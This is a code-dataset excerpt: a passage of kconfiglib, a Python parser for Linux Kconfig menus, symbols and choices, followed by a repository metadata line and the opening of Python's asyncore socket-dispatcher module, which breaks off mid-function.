return (tri_to_int[self._get_visibility()] -
tri_to_int[rev_dep]) > 0
return self._get_visibility() != "n"
def is_defined(self):
"""Returns False if the symbol is referred to in the Kconfig but never
actually defined, otherwise True."""
return self.is_defined_
def is_special(self):
"""Returns True if the symbol is one of the special symbols n, m, y, or
UNAME_RELEASE, or gets its value from the environment. Otherwise,
returns False."""
return self.is_special_
def is_from_environment(self):
"""Returns True if the symbol gets its value from the environment.
Otherwise, returns False."""
return self.is_from_env
def has_ranges(self):
"""Returns True if the symbol is of type INT or HEX and has ranges that
limits what values it can take on, otherwise False."""
return self.ranges != []
def is_choice_symbol(self):
"""Returns True if the symbol is in a choice statement and is an actual
choice symbol (see Choice.get_symbols()); otherwise, returns
False."""
return self.is_choice_symbol_
def is_choice_selection(self):
"""Returns True if the symbol is contained in a choice statement and is
the selected item, otherwise False. Equivalent to 'sym.is_choice_symbol()
and sym.get_parent().get_selection() is sym'."""
return self.is_choice_symbol_ and self.parent.get_selection() is self
def __str__(self):
"""Returns a string containing various information about the symbol."""
return self.config._get_sym_or_choice_str(self)
#
# Private methods
#
def __init__(self):
"""Symbol constructor -- not intended to be called directly by
kconfiglib clients."""
# Set default values
_HasVisibility.__init__(self)
self.config = None
self.parent = None
self.name = None
self.type = UNKNOWN
self.def_exprs = []
self.ranges = []
self.rev_dep = "n"
# The prompt, default value and select conditions without any
# dependencies from menus or if's propagated to them
self.orig_prompts = []
self.orig_def_exprs = []
self.orig_selects = []
# Dependencies inherited from containing menus and if's
self.deps_from_containing = None
self.help = None
# The set of symbols referenced by this symbol (see
# get_referenced_symbols())
self.referenced_syms = set()
# The set of symbols selected by this symbol (see
# get_selected_symbols())
self.selected_syms = set()
# Like 'referenced_syms', but includes symbols from
# dependencies inherited from enclosing menus and if's
self.all_referenced_syms = set()
# This is set to True for "actual" choice symbols. See
# Choice._determine_actual_symbols(). The trailing underscore avoids a
# collision with is_choice_symbol().
self.is_choice_symbol_ = False
# This records only dependencies specified with 'depends on'. Needed
# when determining actual choice items (hrrrr...). See also
# Choice._determine_actual_symbols().
self.menu_dep = None
# See Symbol.get_ref/def_locations().
self.def_locations = []
self.ref_locations = []
self.user_val = None
# Flags
# Should the symbol get an entry in .config?
self.write_to_conf = False
# Caches the calculated value
self.cached_value = None
# Note: An instance variable 'self.dep' gets set on the Symbol in
# Config._build_dep(), linking the symbol to the symbols that
# immediately depend on it (in a caching/invalidation sense). The total
# set of dependent symbols for the symbol (the transitive closure) is
# calculated on an as-needed basis in _get_dependent().
# Caches the total list of dependent symbols. Calculated in
# _get_dependent().
self.cached_deps = None
# Does the symbol have an entry in the Kconfig file? The trailing
# underscore avoids a collision with is_defined().
self.is_defined_ = False
# Does the symbol get its value in some special way, e.g. from the
# environment or by being one of the special symbols n, m, and y? If
# so, the value is stored in self.cached_value, which is never
# invalidated. The trailing underscore avoids a collision with
# is_special().
self.is_special_ = False
# Does the symbol get its value from the environment?
self.is_from_env = False
def _invalidate(self):
if self.is_special_:
return
if self.is_choice_symbol_:
self.parent._invalidate()
_HasVisibility._invalidate(self)
self.write_to_conf = False
self.cached_value = None
def _invalidate_dependent(self):
for sym in self._get_dependent():
sym._invalidate()
def _set_user_value_no_invalidate(self, v, suppress_load_warnings):
"""Like set_user_value(), but does not invalidate any symbols.
suppress_load_warnings --
some warnings are annoying when loading a .config that can be helpful
when manually invoking set_user_value(). This flag is set to True to
suppress such warnings.
Perhaps this could be made optional for load_config() instead."""
if self.is_special_:
if self.is_from_env:
self.config._warn('attempt to assign the value "{0}" to the '
'symbol {1}, which gets its value from the '
'environment. Assignment ignored.'
.format(v, self.name))
else:
self.config._warn('attempt to assign the value "{0}" to the '
'special symbol {1}. Assignment ignored.'
.format(v, self.name))
return
if not self.is_defined_:
filename, linenr = self.ref_locations[0]
self.config._undef_assign('attempt to assign the value "{0}" to {1}, '
"which is referenced at {2}:{3} but never "
"defined. Assignment ignored."
.format(v, self.name, filename, linenr))
return
# Check if the value is valid for our type
if not (( self.type == BOOL and (v == "n" or v == "y") ) or
( self.type == TRISTATE and (v == "n" or v == "m" or
v == "y") ) or
( self.type == STRING ) or
( self.type == INT and _is_base_n(v, 10) ) or
( self.type == HEX and _is_base_n(v, 16) )):
self.config._warn('the value "{0}" is invalid for {1}, which has type {2}. '
"Assignment ignored."
.format(v, self.name, typename[self.type]))
return
if self.prompts == [] and not suppress_load_warnings:
self.config._warn('assigning "{0}" to the symbol {1} which '
'lacks prompts and thus has visibility "n". '
'The assignment will have no effect.'
.format(v, self.name))
self.user_val = v
if self.is_choice_symbol_ and (self.type == BOOL or
self.type == TRISTATE):
choice = self.parent
if v == "y":
choice.user_val = self
choice.user_mode = "y"
elif v == "m":
choice.user_val = None
choice.user_mode = "m"
def _unset_user_value_no_recursive_invalidate(self):
self._invalidate()
self.user_val = None
if self.is_choice_symbol_:
self.parent._unset_user_value()
def _make_conf(self):
if self.already_written:
return []
self.already_written = True
# Note: write_to_conf is determined in get_value()
val = self.get_value()
if not self.write_to_conf:
return []
if self.type == BOOL or self.type == TRISTATE:
if val == "m" or val == "y":
return ["CONFIG_{0}={1}".format(self.name, val)]
return ["# CONFIG_{0} is not set".format(self.name)]
elif self.type == STRING:
# Escape \ and "
return ['CONFIG_{0}="{1}"'
.format(self.name,
val.replace("\\", "\\\\").replace('"', '\\"'))]
elif self.type == INT or self.type == HEX:
return ["CONFIG_{0}={1}".format(self.name, val)]
else:
_internal_error('Internal error while creating .config: unknown type "{0}".'
.format(self.type))
def _get_dependent(self):
"""Returns the set of symbols that should be invalidated if the value
of the symbol changes, because they might be affected by the change.
Note that this is an internal API -- it's probably of limited
usefulness to clients."""
if self.cached_deps is not None:
return self.cached_deps
res = set()
self._add_dependent_ignore_siblings(res)
if self.is_choice_symbol_:
for s in self.parent.get_symbols():
if s is not self:
res.add(s)
s._add_dependent_ignore_siblings(res)
self.cached_deps = res
return res
def _add_dependent_ignore_siblings(self, to):
"""Calculating dependencies gets a bit tricky for choice items as they
all depend on each other, potentially leading to infinite recursion.
This helper function calculates dependencies ignoring the other symbols
in the choice. It also works fine for symbols that are not choice
items."""
for s in self.dep:
to.add(s)
to |= s._get_dependent()
def _has_auto_menu_dep_on(self, on):
"""See Choice._determine_actual_symbols()."""
if not isinstance(self.parent, Choice):
_internal_error("Attempt to determine auto menu dependency for symbol ouside of choice.")
if self.prompts == []:
# If we have no prompt, use the menu dependencies instead (what was
# specified with 'depends on')
return self.menu_dep is not None and \
self.config._expr_depends_on(self.menu_dep, on)
for (_, cond_expr) in self.prompts:
if self.config._expr_depends_on(cond_expr, on):
return True
return False
class Menu(Item):
"""Represents a menu statement."""
#
# Public interface
#
def get_config(self):
"""Return the Config instance this menu is from."""
return self.config
def get_visibility(self):
"""Returns the visibility of the menu. This also affects the visibility
of subitems. See also Symbol.get_visibility()."""
return self.config._eval_expr(self.dep_expr)
def get_visible_if_visibility(self):
"""Returns the visibility the menu gets from its 'visible if'
condition. "y" if the menu has no 'visible if' condition."""
return self.config._eval_expr(self.visible_if_expr)
def get_items(self, recursive = False):
"""Returns a list containing the items (symbols, menus, choice
statements and comments) in in the menu, in the same order that the
items appear within the menu.
recursive (default: False) -- True if items contained in items within
the menu should be included
recursively (preorder)."""
if not recursive:
return self.block.get_items()
res = []
for item in self.block.get_items():
res.append(item)
if isinstance(item, Menu):
res.extend(item.get_items(True))
elif isinstance(item, Choice):
res.extend(item.get_items())
return res
def get_symbols(self, recursive = False):
"""Returns a list containing the symbols in the menu, in the same order
that they appear within the menu.
recursive (default: False) -- True if symbols contained in items within
the menu should be included
recursively."""
return [item for item in self.get_items(recursive) if isinstance(item, Symbol)]
def get_title(self):
"""Returns the title text of the menu."""
return self.title
def get_parent(self):
"""Returns the menu or choice statement that contains the menu, or
None if the menu is at the top level. Note that if statements are
treated as syntactic sugar and do not have an explicit class
representation."""
return self.parent
def get_referenced_symbols(self, refs_from_enclosing = False):
"""See Symbol.get_referenced_symbols()."""
return self.all_referenced_syms if refs_from_enclosing else self.referenced_syms
def get_location(self):
"""Returns the location of the menu as a (filename, linenr) tuple,
where filename is a string and linenr an int."""
return (self.filename, self.linenr)
def __str__(self):
"""Returns a string containing various information about the menu."""
depends_on_str = self.config._expr_val_str(self.orig_deps,
"(no dependencies)")
visible_if_str = self.config._expr_val_str(self.visible_if_expr,
"(no dependencies)")
additional_deps_str = " " + self.config._expr_val_str(self.deps_from_containing,
"(no additional dependencies)")
return _sep_lines("Menu",
"Title : " + self.title,
"'depends on' dependencies : " + depends_on_str,
"'visible if' dependencies : " + visible_if_str,
"Additional dependencies from enclosing menus and if's:",
additional_deps_str,
"Location: {0}:{1}".format(self.filename, self.linenr))
#
# Private methods
#
def __init__(self):
"""Menu constructor -- not intended to be called directly by
kconfiglib clients."""
self.config = None
self.parent = None
self.title = None
self.block = None
self.dep_expr = None
# Dependency expression without dependencies from enclosing menus and
# if's propagated
self.orig_deps = None
# Dependencies inherited from containing menus and if's
self.deps_from_containing = None
# The 'visible if' expression
self.visible_if_expr = None
# The set of symbols referenced by this menu (see
# get_referenced_symbols())
self.referenced_syms = set()
# Like 'referenced_syms', but includes symbols from
# dependencies inherited from enclosing menus and if's
self.all_referenced_syms = None
self.filename = None
self.linenr = None
def _make_conf(self):
item_conf = self.block._make_conf()
if self.config._eval_expr(self.dep_expr) != "n" and \
self.config._eval_expr(self.visible_if_expr) != "n":
return ["\n#\n# {0}\n#".format(self.title)] + item_conf
return item_conf
class Choice(Item, _HasVisibility):
"""Represents a choice statement. A choice can be in one of three modes:
"n" - The choice is not visible and no symbols can be selected.
"m" - Any number of symbols can be set to "m". The rest will be "n". This
is safe since potentially conflicting options don't actually get
compiled into the kernel simultaneously with "m".
"y" - One symbol will be "y" while the rest are "n".
Only tristate choices can be in "m" mode, and the visibility of the choice
is an upper bound on the mode, so that e.g. a choice that depends on a
symbol with value "m" will be in "m" mode.
The mode changes automatically when a value is assigned to a symbol within
the choice.
See Symbol.get_visibility() too."""
#
# Public interface
#
def get_selection(self):
"""Returns the symbol selected (either by the user or through
defaults), or None if either no symbol is selected or the mode is not
"y"."""
if self.cached_selection is not None:
if self.cached_selection == NO_SELECTION:
return None
return self.cached_selection
if self.get_mode() != "y":
return self._cache_ret(None)
# User choice available?
if self.user_val is not None and \
self.user_val._get_visibility() == "y":
return self._cache_ret(self.user_val)
if self.optional:
return self._cache_ret(None)
return self._cache_ret(self.get_selection_from_defaults())
def get_selection_from_defaults(self):
"""Like Choice.get_selection(), but acts as if no symbol has been
selected by the user and no 'optional' flag is in effect."""
if self.actual_symbols == []:
return None
for (symbol, cond_expr) in self.def_exprs:
if self.config._eval_expr(cond_expr) != "n":
chosen_symbol = symbol
break
else:
chosen_symbol = self.actual_symbols[0]
# Is the chosen symbol visible?
if chosen_symbol._get_visibility() != "n":
return chosen_symbol
# Otherwise, pick the first visible symbol
for sym in self.actual_symbols:
if sym._get_visibility() != "n":
return sym
return None
def get_user_selection(self):
"""If the choice is in "y" mode and has a user-selected symbol, returns
that symbol. Otherwise, returns None."""
return self.user_val
def get_config(self):
"""Returns the Config instance this choice is from."""
return self.config
def get_name(self):
"""For named choices, returns the name. Returns None for unnamed
choices. No named choices appear anywhere in the kernel Kconfig files
as of Linux 3.7.0-rc8."""
return self.name
def get_help(self):
"""Returns the help text of the choice, or None if the choice has no
help text."""
return self.help
def get_type(self):
"""Returns the type of the choice. See Symbol.get_type()."""
return self.type
def get_items(self):
"""Gets all items contained in the choice in the same order as within
the configuration ("items" instead of "symbols" since choices and
comments might appear within choices. This only happens in one place as
of Linux 3.7.0-rc8, in drivers/usb/gadget/Kconfig)."""
return self.block.get_items()
def get_symbols(self):
"""Returns a list containing the choice's symbols.
A quirk (perhaps a bug) of Kconfig is that you can put items within a
choice that will not be considered members of the choice insofar as
selection is concerned. This happens for example if one symbol within a
choice 'depends on' the symbol preceding it, or if you put non-symbol
items within choices.
As of Linux 3.7.0-rc8, this seems to be used intentionally in one
place: drivers/usb/gadget/Kconfig.
This function returns the "proper" symbols of the choice in the order
they appear in the choice, excluding such items. If you want all items
in the choice, use get_items()."""
return self.actual_symbols
def get_parent(self):
"""Returns the menu or choice statement that contains the choice, or
None if the choice is at the top level. Note that if statements are
treated as syntactic sugar and do not have an explicit class
representation."""
return self.parent
def get_referenced_symbols(self, refs_from_enclosing = False):
"""See Symbol.get_referenced_symbols()."""
return self.all_referenced_syms if refs_from_enclosing else self.referenced_syms
def get_def_locations(self):
"""Returns a list of (filename, linenr) tuples, where filename (string)
and linenr (int) represent a location where the choice is defined. For
the vast majority of choices (all of them as of Linux 3.7.0-rc8) this
list will only contain one element, but its possible for named choices
to be defined in multiple locations."""
return self.def_locations
def get_visibility(self):
"""Returns the visibility of the choice statement: one of "n", "m" or
"y". This acts as an upper limit on the mode of the choice (though bool
choices can only have the mode "y"). See the class documentation for an
explanation of modes."""
return self._get_visibility()
def get_mode(self):
"""Returns the mode of the choice. See the class documentation for
an explanation of modes."""
minimum_mode = "n" if self.optional else "m"
mode = self.user_mode if self.user_mode is not None else minimum_mode
mode = self.config._eval_min(mode, self._get_visibility())
# Promote "m" to "y" for boolean choices
if mode == "m" and self.type == BOOL:
return "y"
return mode
def is_optional(self):
"""Returns True if the symbol has the optional flag set (and so will default
to "n" mode). Otherwise, returns False."""
return self.optional
def __str__(self):
"""Returns a string containing various information about the choice
statement."""
return self.config._get_sym_or_choice_str(self)
#
# Private methods
#
def __init__(self):
"""Choice constructor -- not intended to be called directly by
kconfiglib clients."""
_HasVisibility.__init__(self)
self.config = None
self.parent = None
self.name = None # Yes, choices can be named
self.type = UNKNOWN
self.def_exprs = []
self.help = None
self.optional = False
self.block = None
# The prompts and default values without any dependencies from
# enclosing menus or if's propagated
self.orig_prompts = []
self.orig_def_exprs = []
# Dependencies inherited from containing menus and if's
self.deps_from_containing = None
# We need to filter out symbols that appear within the choice block but
# are not considered choice items (see
# Choice._determine_actual_symbols()) This list holds the "actual" choice
# items.
self.actual_symbols = []
# The set of symbols referenced by this choice (see
# get_referenced_symbols())
self.referenced_syms = set()
# Like 'referenced_syms', but includes symbols from
# dependencies inherited from enclosing menus and if's
self.all_referenced_syms = set()
# See Choice.get_def_locations()
self.def_locations = []
self.user_val = None
self.user_mode = None
self.cached_selection = None
def _determine_actual_symbols(self):
"""If a symbol's visibility depends on the preceding symbol within a
choice, it is no longer viewed as a choice item (quite possibly a bug,
but some things consciously use it.. ugh. It stems from automatic
submenu creation). In addition, it's possible to have choices and
comments within choices, and those shouldn't be considered as choice
items either. Only drivers/usb/gadget/Kconfig seems to depend on any of
this. This method computes the "actual" items in the choice and sets
the is_choice_symbol_ flag on them (retrieved via is_choice_symbol()).
Don't let this scare you: an earlier version simply checked for a
sequence of symbols where all symbols after the first appeared in the
'depends on' expression of the first, and that worked fine. The added
complexity is to be future-proof in the event that
drivers/usb/gadget/Kconfig turns even more sinister. It might very well
be overkilling things (especially if that file is refactored ;)."""
items = self.block.get_items()
# Items might depend on each other in a tree structure, so we need a
# stack to keep track of the current tentative parent
stack = []
for item in items:
if not isinstance(item, Symbol):
stack = []
continue
while stack != []:
if item._has_auto_menu_dep_on(stack[-1]):
# The item should not be viewed as a choice item, so don't
# set item.is_choice_symbol_.
stack.append(item)
break
else:
stack.pop()
else:
item.is_choice_symbol_ = True
self.actual_symbols.append(item)
stack.append(item)
def _cache_ret(self, selection):
# As None is used to indicate the lack of a cached value we can't use
# that to cache the fact that the choice has no selection. Instead, we
# use the symbolic constant NO_SELECTION.
if selection is None:
self.cached_selection = NO_SELECTION
else:
self.cached_selection = selection
return selection
def _invalidate(self):
_HasVisibility._invalidate(self)
self.cached_selection = None
def _unset_user_value(self):
self._invalidate()
self.user_val = None
self.user_mode = None
def _make_conf(self):
return self.block._make_conf()
class Comment(Item):
"""Represents a comment statement."""
#
# Public interface
#
def get_config(self):
"""Returns the Config instance this comment is from."""
return self.config
def get_visibility(self):
"""Returns the visibility of the comment. See also
Symbol.get_visibility()."""
return self.config._eval_expr(self.dep_expr)
def get_text(self):
"""Returns the text of the comment."""
return self.text
def get_parent(self):
"""Returns the menu or choice statement that contains the comment, or
None if the comment is at the top level. Note that if statements are
treated as syntactic sugar and do not have an explicit class
representation."""
return self.parent
def get_referenced_symbols(self, refs_from_enclosing = False):
"""See Symbol.get_referenced_symbols()."""
return self.all_referenced_syms if refs_from_enclosing else self.referenced_syms
def get_location(self):
"""Returns the location of the comment as a (filename, linenr) tuple,
where filename is a string and linenr an int."""
return (self.filename, self.linenr)
def __str__(self):
"""Returns a string containing various information about the comment."""
dep_str = self.config._expr_val_str(self.orig_deps, "(no dependencies)")
additional_deps_str = " " + self.config._expr_val_str(self.deps_from_containing,
"(no additional dependencies)")
return _sep_lines("Comment",
"Text: " + str(self.text),
"Dependencies: " + dep_str,
"Additional dependencies from enclosing menus and if's:",
additional_deps_str,
"Location: {0}:{1}".format(self.filename, self.linenr))
#
# Private methods
#
def __init__(self):
"""Comment constructor -- not intended to be called directly by
kconfiglib clients."""
self.config = None
self.parent = None
self.text = None
self.dep_expr = None
# Dependency expression without dependencies from enclosing menus and
# if's propagated
self.orig_deps = None
# Dependencies inherited from containing menus and if's
self.deps_from_containing = None
# The set of symbols referenced by this comment (see
# get_referenced_symbols())
self.referenced_syms = set()
# Like 'referenced_syms', but includes symbols from
# dependencies inherited from enclosing menus and if's
self.all_referenced_syms = None
self.filename = None
self.linenr = None
def _make_conf(self):
if self.config._eval_expr(self.dep_expr) != "n":
return ["\n#\n# {0}\n#".format(self.text)]
return []
class _Feed:
"""Class for working with sequences in a stream-like fashion; handy for tokens."""
def __init__(self, items):
self.items = items
self.length = len(self.items)
self.i = 0
def get_next(self):
if self.i >= self.length:
return None
item = self.items[self.i]
self.i += 1
return item
def peek_next(self):
return None if self.i >= self.length else self.items[self.i]
def go_to_start(self):
self.i = 0
def __getitem__(self, index):
return self.items[index]
def __len__(self):
return len(self.items)
def is_empty(self):
return self.items == []
def check(self, token):
"""Check if the next token is 'token'. If so, remove it from the token
feed and return True. Otherwise, leave it in and return False."""
if self.i >= self.length:
return None
if self.items[self.i] == token:
self.i += 1
return True
return False
def remove_while(self, pred):
while self.i < self.length and pred(self.items[self.i]):
self.i += 1
def go_back(self):
if self.i <= 0:
_internal_error("Attempt to move back in Feed while already at the beginning.")
self.i -= 1
class _FileFeed(_Feed):
"""Feed subclass that keeps track of the current filename and line
number."""
def __init__(self, lines, filename):
self.filename = _clean_up_path(filename)
_Feed.__init__(self, lines)
def get_filename(self):
return self.filename
def get_linenr(self):
return self.i
#
# Misc. public global utility functions
#
def tri_less(v1, v2):
"""Returns True if the tristate v1 is less than the tristate v2, where "n",
"m" and "y" are ordered from lowest to highest. Otherwise, returns
False."""
return tri_to_int[v1] < tri_to_int[v2]
def tri_less_eq(v1, v2):
"""Returns True if the tristate v1 is less than or equal to the tristate
v2, where "n", "m" and "y" are ordered from lowest to highest. Otherwise,
returns False."""
return tri_to_int[v1] <= tri_to_int[v2]
def tri_greater(v1, v2):
"""Returns True if the tristate v1 is greater than the tristate v2, where
"n", "m" and "y" are ordered from lowest to highest. Otherwise, returns
False."""
return tri_to_int[v1] > tri_to_int[v2]
def tri_greater_eq(v1, v2):
"""Returns True if the tristate v1 is greater than or equal to the tristate
v2, where "n", "m" and "y" are ordered from lowest to highest. Otherwise,
returns False."""
return tri_to_int[v1] >= tri_to_int[v2]
#
# Helper functions, mostly related to text processing
#
def _strip_quotes(s, line, filename, linenr):
"""Removes any quotes surrounding 's' if it has them; otherwise returns 's'
unmodified."""
s = s.strip()
if not s:
return ""
if s[0] == '"' or s[0] == "'":
if len(s) < 2 or s[-1] != s[0]:
_parse_error(line,
"malformed string literal",
filename,
linenr)
return s[1:-1]
return s
def _indentation(line):
"""Returns the indentation of the line, treating tab stops as being spaced
8 characters apart."""
if line.isspace():
_internal_error("Attempt to take indentation of blank line.")
indent = 0
for c in line:
if c == " ":
indent += 1
elif c == "\t":
# Go to the next tab stop
indent = (indent + 8) & ~7
else:
return indent
def _deindent(line, indent):
"""Deindent 'line' by 'indent' spaces."""
line = line.expandtabs()
if len(line) <= indent:
return line
return line[indent:]
def _is_base_n(s, n):
try:
int(s, n)
return True
except ValueError:
return False
def _sep_lines(*args):
"""Returns a string comprised of all arguments, with newlines inserted
between them."""
return "\n".join(args)
def _comment(s):
"""Returns a new string with "#" inserted before each line in 's'."""
if not s:
return "#"
res = "".join(["#" + line for line in s.splitlines(True)])
if s.endswith("\n"):
return res + "#"
return res
def _get_lines(filename):
"""Returns a list of lines from 'filename', joining any line ending in \\
with the following line."""
with open(filename, "r") as f:
lines = []
accum = ""
while 1:
line = f.readline()
if line == "":
return lines
if line.endswith("\\\n"):
accum += line[:-2]
else:
accum += line
lines.append(accum)
accum = ""
def _strip_trailing_slash(path):
"""Removes any trailing slash from 'path'."""
return path[:-1] if path.endswith("/") else path
def _clean_up_path(path):
"""Strips any initial "./" and trailing slash from 'path'."""
if path.startswith("./"):
path = path[2:]
return _strip_trailing_slash(path)
#
# Error handling
#
class Kconfig_Syntax_Error(Exception):
"""Exception raised for syntax errors."""
pass
class Internal_Error(Exception):
"""Exception raised for internal errors."""
pass
def _tokenization_error(s, index, filename, linenr):
if filename is not None:
assert linenr is not None
sys.stderr.write("{0}:{1}:\n".format(filename, linenr))
if s.endswith("\n"):
s = s[:-1]
# Calculate the visual offset corresponding to index 'index' in 's'
# assuming tabstops are spaced 8 characters apart
vis_index = 0
for c in s[:index]:
if c == "\t":
vis_index = (vis_index + 8) & ~7
else:
vis_index += 1
# Don't output actual tabs to be independent of how the terminal renders
# them
s = s.expandtabs()
raise Kconfig_Syntax_Error, (
_sep_lines("Error during tokenization at location indicated by caret.\n",
s,
" " * vis_index + "^\n"))
def _parse_error(s, msg, filename, linenr):
error_str = ""
if filename is not None:
assert linenr is not None
error_str += "{0}:{1}: ".format(filename, linenr)
if s.endswith("\n"):
s = s[:-1]
error_str += 'Error while parsing "{0}"'.format(s) + \
("." if msg is None else ": " + msg)
raise Kconfig_Syntax_Error, error_str
def _internal_error(msg):
msg += "\nSorry! You may want to send an email to kconfiglib@gmail.com " \
"to tell me about this. Include the message above and the stack " \
"trace and describe what you were doing."
raise Internal_Error, msg
if use_psyco:
import psyco
Config._tokenize = psyco.proxy(Config._tokenize)
Config._eval_expr = psyco.proxy(Config._eval_expr)
_indentation = psyco.proxy(_indentation)
_get_lines = psyco.proxy(_get_lines)
|
andreparrish/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/asyncore.py
|
46
|
# -*- Mode: Python -*-
# Id: asyncore.py,v 2.51 2000/09/07 22:29:26 rushing Exp
# Author: Sam Rushing <rushing@nightmare.com>
# ======================================================================
# Copyright 1996 by Sam Rushing
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Sam
# Rushing not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# ======================================================================
"""Basic infrastructure for asynchronous socket service clients and servers.
There are only two ways to have a program on a single processor do "more
than one thing at a time". Multi-threaded programming is the simplest and
most popular way to do it, but there is another very different technique,
that lets you have nearly all the advantages of multi-threading, without
actually using multiple threads. it's really only practical if your program
is largely I/O bound. If your program is CPU bound, then pre-emptive
scheduled threads are probably what you really need. Network servers are
rarely CPU-bound, however.
If your operating system supports the select() system call in its I/O
library (and nearly all do), then you can use it to juggle multiple
communication channels at once; doing other work while your I/O is taking
place in the "background." Although this strategy can seem strange and
complex, especially at first, it is in many ways easier to understand and
control than multi-threaded programming. The module documented here solves
many of the difficult problems for you, making the task of building
sophisticated high-performance network servers and clients a snap.
"""
import select
import socket
import sys
import time
import warnings
import os
from errno import EALREADY, EINPROGRESS, EWOULDBLOCK, ECONNRESET, EINVAL, \
ENOTCONN, ESHUTDOWN, EINTR, EISCONN, EBADF, ECONNABORTED, EPIPE, EAGAIN, \
errorcode
_DISCONNECTED = frozenset((ECONNRESET, ENOTCONN, ESHUTDOWN, ECONNABORTED, EPIPE,
EBADF))
try:
socket_map
except NameError:
socket_map = {}
def _strerror(err):
try:
return os.strerror(err)
except (ValueError, OverflowError, NameError):
if err in errorcode:
return errorcode[err]
return "Unknown error %s" %err
class ExitNow(Exception):
pass
_reraised_exceptions = (ExitNow, KeyboardInterrupt, SystemExit)
def read(obj):
try:
obj.handle_read_event()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def write(obj):
try:
obj.handle_write_event()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def _exception(obj):
try:
obj.handle_expt_event()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def readwrite(obj, flags):
try:
if flags & select.POLLIN:
obj.handle_read_event()
if flags & select.POLLOUT:
obj.handle_write_event()
if flags & select.POLLPRI:
obj.handle_expt_event()
if flags & (select.POLLHUP | select.POLLERR | select.POLLNVAL):
obj.handle_close()
except socket.error as e:
if e.args[0] not in _DISCONNECTED:
obj.handle_error()
else:
obj.handle_close()
except _reraised_exceptions:
raise
except:
obj.handle_error()
def poll(timeout=0.0, map=None):
if map is None:
map = socket_map
if map:
r = []; w = []; e = []
for fd, obj in list(map.items()):
is_r = obj.readable()
is_w = obj.writable()
if is_r:
r.append(fd)
# accepting sockets should not be writable
if is_w and not obj.accepting:
w.append(fd)
if is_r or is_w:
e.append(fd)
if [] == r == w == e:
time.sleep(timeout)
return
try:
r, w, e = select.select(r, w, e, timeout)
except select.error as err:
if err.args[0] != EINTR:
raise
else:
return
for fd in r:
obj = map.get(fd)
if obj is None:
continue
read(obj)
for fd in w:
obj = map.get(fd)
if obj is None:
continue
write(obj)
for fd in e:
obj = map.get(fd)
if obj is None:
continue
_exception(obj)
def poll2(timeout=0.0, map=None):
# Use the poll() support added to the select module in Python 2.0
if map is None:
map = socket_map
if timeout is not None:
# timeout is in milliseconds
timeout = int(timeout*1000)
pollster = select.poll()
if map:
for fd, obj in list(map.items()):
flags = 0
if obj.readable():
flags |= select.POLLIN | select.POLLPRI
# accepting sockets should not be writable
if obj.writable() and not obj.accepting:
flags |= select.POLLOUT
if flags:
# Only check for exceptions if object was either readable
# or writable.
flags |= select.POLLERR | select.POLLHUP | select.POLLNVAL
pollster.register(fd, flags)
try:
r = pollster.poll(timeout)
except select.error as err:
if err.args[0] != EINTR:
raise
r = []
for fd, flags in r:
obj = map.get(fd)
if obj is None:
continue
readwrite(obj, flags)
poll3 = poll2 # Alias for backward compatibility
def loop(timeout=30.0, use_poll=False, map=None, count=None):
if map is None:
map = socket_map
if use_poll and hasattr(select, 'poll'):
poll_fun = poll2
else:
poll_fun = poll
if count is None:
while map:
poll_fun(timeout, map)
else:
while map and count > 0:
poll_fun(timeout, map)
count = count - 1
class dispatcher:
debug = False
connected = False
accepting = False
closing = False
addr = None
ignore_log_types = frozenset(['warning'])
def __init__(self, sock=None, map=None):
if map is None:
self._map = socket_map
else:
self._map = map
self._fileno = None
if sock:
# Set to nonblocking just to make sure for cases where we
# get a socket from a blocking source.
sock.setblocking(0)
self.set_socket(sock, map)
self.connected = True
# The constructor no longer requires that the socket
# passed be connected.
try:
self.addr = sock.getpeername()
except socket.error as err:
if err.args[0] == ENOTCONN:
# To handle the case where we got an unconnected
# socket.
self.connected = False
else:
# The socket is broken in some unknown way, alert
# the user and remove it from the map (to prevent
# polling of broken sockets).
self.del_channel(map)
raise
else:
self.socket = None
def __repr__(self):
status = [self.__class__.__module__+"."+self.__class__.__name__]
if self.accepting and self.addr:
status.append('listening')
elif self.connected:
status.append('connected')
if self.addr is not None:
try:
status.append('%s:%d' % self.addr)
except TypeError:
status.append(repr(self.addr))
return '<%s at %#x>' % (' '.join(status), id(self))
__str__ = __repr__
def add_channel(self, map=None):
#self.log_info('adding channel %s' % self)
if map is None:
map = self._map
map[self._fileno] = self
def del_channel(self, map=None):
fd = self._fileno
if map is None:
map = self._map
if fd in map:
#self.log_info('closing channel %d:%s' % (fd, self))
del map[fd]
self._fileno = None
def create_socket(self, family, type):
self.family_and_type = family, type
sock = socket.socket(family, type)
sock.setblocking(0)
self.set_socket(sock)
def set_socket(self, sock, map=None):
self.socket = sock
## self.__dict__['socket'] = sock
self._fileno = sock.fileno()
self.add_channel(map)
def set_reuse_addr(self):
# try to re-use a server port if possible
try:
self.socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR,
self.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR) | 1
)
except socket.error:
pass
# ==================================================
# predicates for select()
# these are used as filters for the lists of sockets
# to pass to select().
# ==================================================
def readable(self):
return True
def writable(self):
return True
# ==================================================
# socket object methods.
# ==================================================
def listen(self, num):
self.accepting = True
if os.name == 'nt' and num > 5:
num = 5
return self.socket.listen(num)
def bind(self, addr):
self.addr = addr
return self.socket.bind(addr)
def connect(self, address):
self.connected = False
err = self.socket.connect_ex(address)
if err in (EINPROGRESS, EALREADY, EWOULDBLOCK) \
or err == EINVAL and os.name in ('nt', 'ce'):
return
